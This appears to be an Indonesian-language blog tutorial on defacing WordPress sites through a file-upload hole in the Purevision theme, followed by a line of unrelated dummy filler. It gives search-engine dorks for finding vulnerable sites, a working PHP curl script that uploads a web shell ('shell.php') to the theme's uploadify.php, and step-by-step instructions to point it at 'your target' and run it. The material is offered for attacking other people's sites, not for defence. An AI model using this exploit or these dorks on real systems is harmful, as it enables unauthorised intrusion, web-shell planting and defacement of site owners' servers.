Exploit title: Wordpress Themes Purevision File Upload Vulnerability
Dork: inurl:/wp-content/themes/purevision
inurl:/wp-content/themes/purevision intext:index of
Index of /wp-content/themes/purevision/
Bahan-bahan:
- Xampp : Download
Exploit:
<?php
$uploadfile="shell.php";
$ch = curl_init("http://example.com/wp-content/themes/purevision/scripts/admin/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/themes/purevision/scripts/admin/uploadify/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?> Tutorial:
- Buka Xampp, start Apace dan MySql
- Edit Exploit di atas,
example.com ganti dengan link target mu- Simpan Exploit di C: > xampp > php dengan format .php
- Run exploit tadi dengan cmd, perintahnya php exploit.php enter
Jika keluar angka 1 tandanya exploit sukses atau target vuln
Tag: tutorial deface, cara deface, deface purevision, themes purevision, exploits, purevision, deface dengan purevision, step by step deface
This is dummy text. It is not meant to be read. Accordingly, it is difficult to figure out when to end it. But then, this is dummy text. It is not meant to be read. Period.